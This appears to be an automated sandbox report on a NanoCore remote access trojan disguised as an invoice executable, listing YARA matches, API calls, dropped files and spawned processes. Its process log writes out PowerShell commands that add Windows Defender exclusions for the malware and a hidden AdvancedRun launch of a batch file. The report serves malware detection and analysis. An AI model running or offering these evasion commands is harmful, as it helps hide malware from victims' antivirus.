Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>

Executable has a suspicious name (potential lure to open the executable)

Show sources

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static file information: Suspicious name

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: CN-Invoice-XXXXX9808-19011143287989.exe

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Code function: 0_2_0660DFF0 NtSetInformationThread,

0_2_0660DFF0

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj

Jump to behavior

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_01082080	0_2_01082080
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_01082070	0_2_01082070
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_0108CEC0	0_2_0108CEC0
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_0108B27C	0_2_0108B27C
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_06607350	0_2_06607350
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Code function: 0_2_065E0040	0_2_065E0040
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 22_2_050B2070	22_2_050B2070
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 22_2_050BB27C	22_2_050BB27C
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 26_2_013D2070	26_2_013D2070
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 26_2_013DEB71	26_2_013DEB71
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 26_2_013DCAEC	26_2_013DCAEC
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 26_2_013DEB91	26_2_013DEB91
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 26_2_013DCAE0	26_2_013DCAE0
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Code function: 26_2_013DB27C	26_2_013DB27C

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: String function: 0040B550 appears 50 times

Source: CN-Invoice-XXXXX9808-19011143287989.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: svchost.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: CN-Invoice-XXXXX9808-19011143287989.exe	Binary or memory string: OriginalFilename vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.805265607.0000000000702000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameRJFBoOwW.exe2 vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp	Binary or memory string: ,@shell32.dllSHGetSpecialFolderPathWshlwapi.dllSHAutoComplete%2.2X%2.2X%2.2X<>"°&<br><font size="%d" color="#%s"><b></b>\StringFileInfo\\VarFileInfo\Translation%4.4X%4.4X040904E4ProductNameFileDescriptionFileVersionProductVersionCompanyNameInternalNameLegalCopyrightOriginalFileNameRSDSu vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.843682697.0000000003C99000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameAdvancedRun.exe8 vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.844279687.0000000003D0B000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameRunPeBraba.dll6 vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.875887622.0000000005950000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.877180450.0000000006140000.00000002.00000001.sdmp	Binary or memory string: System.OriginalFileName vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe, 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameYHjI Bhf.exe2 vs CN-Invoice-XXXXX9808-19011143287989.exe
Source: CN-Invoice-XXXXX9808-19011143287989.exe	Binary or memory string: OriginalFilenameRJFBoOwW.exe2 vs CN-Invoice-XXXXX9808-19011143287989.exe

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000016.00000002.954773732.0000000003D76000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.849818190.000000000405C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: CN-Invoice-XXXXX9808-19011143287989.exe PID: 7164, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4378a80.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.svchost.exe.3da9c08.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 22.2.svchost.exe.3d76de8.5.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.43b8aa0.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.svchost.exe.3da9c08.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.CN-Invoice-XXXXX9808-19011143287989.exe.4358a60.6.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 22.2.svchost.exe.3d76de8.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore

Source: classification engine

Classification label: mal100.troj.evad.winEXE@28/13@3/3

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 10_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,		10_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Code function: 11_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,		11_2_00408FC9

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

10_2_004095FD

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,

10_2_0040A33B

Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe

Code function: 10_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

10_2_00401306

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CN-Invoice-XXXXX9808-19011143287989.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5844:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_01

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a

Jump to behavior

Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: CN-Invoice-XXXXX9808-19011143287989.exe	Virustotal: Detection: 28%
Source: CN-Invoice-XXXXX9808-19011143287989.exe	ReversingLabs: Detection: 29%

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

File read: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe'
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' -Force
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /SpecialRun 4101d8 5956
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Source: unknown	Process created: C:\Windows\explorer.exe 'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknown	Process created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\88cd6bf2-6bfc-4af1-8adf-7503b9084d9a\AdvancedRun.exe' /SpecialRun 4101d8 5956	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe 'C:\Windows\Microsoft.NET\Framework\cWTOcPXozTBTfRcFGybj\svchost.exe'

Source: C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287989.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CN-Invoice-XXXXX9808-19011143287989.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Data Obfuscation:

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0x8AB4D40F [Tue Sep 29 02:29:35 2043 UTC]

